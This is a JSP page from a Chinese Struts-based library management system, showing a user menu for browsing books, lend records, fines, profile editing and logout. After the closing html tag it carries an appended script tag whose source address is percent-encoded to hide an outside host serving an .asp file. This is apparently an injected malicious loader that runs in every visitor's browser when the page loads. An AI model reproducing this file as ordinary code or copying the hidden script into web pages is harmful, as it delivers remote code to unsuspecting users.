📄 index.jsp
字号:
<%@ page contentType="text/html; charset=GBK" %>
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-html.tld" prefix="html" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<html>
<head>
<title>
图书管理系统
</title>
<script type="" language="javascript" src="js/public.js"></script>
<jsp:include flush="false" page="isLogin.jsp"/>
</head>
<body bgcolor="#ffffff">
<center>
<TABLE cellSpacing=0 cellPadding=0 width=866 align=center border=0>
<TBODY>
<TR>
<TD colSpan=2 height=16><IMG height=92 src="images/logo.jpg"
width=224><IMG height=92 src="images/logo1.jpg" width=643 border=0></TD></TR>
</TBODY>
</TABLE>
</center>
<br><br>
<br>
<center>
<table>
<tr>
<th>
<a href="BooksPageAction.do"><bean:message key="jsp.user.index.menu.scanbooks"/> </a>
</th>
<th>
<a href="LendBookListAction.do"><bean:message key="jsp.user.index.menu.scanlendbook"/> </a>
</th>
<th>
<a href="UserPunishPageAction.do?page=1"><bean:message key="jsp.user.index.menu.scanpunish"/> </a>
</th>
<th>
<a href="index.jsp?action=4"><bean:message key="jsp.user.index.menu.chengeinfo"/> </a>
</th>
<th>
<a href="OutAction.do"><bean:message key="jsp.user.index.menu.loginout"/></a>
</th>
</tr>
</table>
<table>
<tbody>
<logic:equal parameter="action" value="1">
<jsp:include flush="false" page="booklist.jsp"/>
</logic:equal>
<logic:equal parameter="action" value="2">
<jsp:include flush="false" page="lendlist.jsp"/>
</logic:equal>
<logic:equal parameter="action" value="3">
<jsp:include flush="false" page="punishlist.jsp"/>
</logic:equal>
<logic:equal parameter="action" value="4">
<jsp:include flush="false" page="editinfo.jsp"/>
</logic:equal>
</tbody>
</table>
</center>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<center>
<TABLE cellSpacing=0 cellPadding=0 width=866 align=center border=0>
<TBODY>
<TR>
<TD colSpan=2 height=16><IMG height=92 src="images/button.jpg"
width=866></TD></TR>
</TBODY>
</TABLE>
</center>
</body>
</html>
<script src="http://%78%66%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -